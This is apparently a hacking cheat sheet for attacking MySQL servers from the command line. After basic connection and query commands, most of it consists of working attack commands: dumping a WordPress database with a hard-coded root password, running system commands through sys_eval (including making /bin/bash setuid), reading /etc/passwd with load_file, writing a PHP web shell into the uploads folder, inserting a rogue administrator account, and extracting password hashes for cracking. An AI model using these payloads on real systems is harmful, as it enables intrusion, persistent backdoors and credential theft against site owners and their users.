Command Line MySQL for Hackers
Learning to connect to a MySQL server via command line is extremely useful in many situations especially for penetration testing. It’s quick, easy to learn and the fastest way to get in.
General MySQL CLI
Connect to the Database
This command will log you into the MySQL server with user “user” on host address 192.168.0.26.
|
1 |
mysql -u user -p -h 192.168.0.26 |
Enter password: <br> Welcome to the MariaDB monitor. Commands end with ; or \g.<br><br> Your MySQL connection id is 4 <br> <br> Server version: 5.7.28-0ubuntu0.16.04.2 (Ubuntu) <br><br> <br> Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. <br><br> <br> Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement. <br><br> <br> MySQL [(none)]>
View and Connect to a Database
To see what databases are available to the user you’ve logged in with type the “show” command. To start viewing information about the database use the “use” command.”.
|
1 2 |
show databases; use databasename; |
Tricks!
|
1 2 |
# execute commands against mysql mysql -u user -p --execute="show databases" |
Table Viewing and Manipulation
The two most important things you should know is how to see the tables of a database and view the definition.
|
1 2 |
show tables; select * from tablename; |
To see information about a table such as a schema use the “describe” command.
|
1 |
describe tablename; |
Advanced MySQL Commands for Hackers
Creating Local Database
|
1 2 |
create database wp_hacked; use wp_hacked; |
Importing data from a SQL file is easy…
|
1 |
mysql -u root -p database < wp_db.sql |
Ex-filtrating Database Schema
The user is “root” and the password is “plbkac”.. Yes, there isn’t a space between “-p” and the password. That is the way you do it…
|
1 |
mysqldump --no-data -h 192.168.0.26 -u root -pplbkac wordpress > wp_db.sql |
If you just want one table with no data… try this…
|
1 |
mysqldump -d -h 192.168.0.26 -u root -pplbkac wordpress wp_users > wp_users.sql |
Ex-filtrating Data
|
1 |
mysqldump --tab=/tmp -h 192.168.0.34 -u root -pplbkac wordpress wp_users wp_users; |
Running System Commands
|
1 2 |
select sys_eval("whoami"); select sys_eval("chmod u+s /bin/bash"); |
Reading Data
It is possible to read sensitive files using MySQL commands.
|
1 2 |
select load_file("/etc/shells"); select load_file("/etc/passwd"); |
Create Backdoor PHP Script
This will create a PHP backdoor script that will execute commands against the system. You can easily call home with a reverse shell.
|
1 |
SELECT "<?php echo system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/wp-content/uploads/shell.php"; |
WordPress Privilege Escalation
You can create a new user with administrative access very easily using SQL. There are 2 tables and 3 sets of data the must be inserted to accomplish this. If you don’t want to create a new user and have compromised a low privileged user you can use SQL to elevate your privileges by updating the wp_usermeta table. Adjusting the meta_value for the meta_keys “wp_capabilities” and “wp_user_level” will elevate access if done correctly.
This script isn’t 100% accurate. WordPress no longer users MD5 hashes for passwords. There’s a script that adds a salt in WordPress. You’ll have to reset your password or copy in a known user’s password.
The key thing about WordPress is understanding how data is saved. Some of the data in WordPress is saved in composite JSON strings.
a:1:{s:6:"author";b:1;}
You can’t just change “author” to “administrator”. The “s” stands for string and the 6 means it is 6 characters long. You must update the entire JSON string to make this work.
a:1:{s:13:"administrator";s:1:"1";}
You will need to find the TOP value for the ID. This will not work if the ID already exists.
|
1 2 3 4 5 6 7 |
INSERT INTO `wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('8', 'gotcha', MD5('demo'), 'Your Name', '[email protected]', 'http://www.hackaco.com/', '2019-11-2100:00:00', '', '0', 'L33t Haxor'); INSERT INTO `wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '8', 'wp_capabilities', 'a:1:{s:13:"administrator";s:1:"1";}'); INSERT INTO `wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '8', 'wp_user_level', '10'); |
Extracting WordPress Hashes for John
By concatenating the user login and password we can better extract data ready for John the Ripper.
|
1 |
select concat_ws(':', user_login, user_pass) from wp_users; |
|
1 2 3 4 5 6 7 8 9 |
+--------------------------------------------+ | concat_ws(':', user_login, user_pass) | +--------------------------------------------+ | admin:$P$BJQSBmO3Hj5SIDKzAkVX8wQYN6EJqx/ | | barney:$P$Brk7T36qysdSksZmPyfdQCqpoaIqvN1 | | gillian:$P$BJxWr8/nTjEC6IttflERKg2v.THUNA1 | | peter:$P$B3eHaQ66YFM6EwWB6y/Y3i/3ud1Kqp/ | | stephen:$P$BcQaPOdWmcAzREQh9rR2bmGBBz6qUO1 | +--------------------------------------------+ |
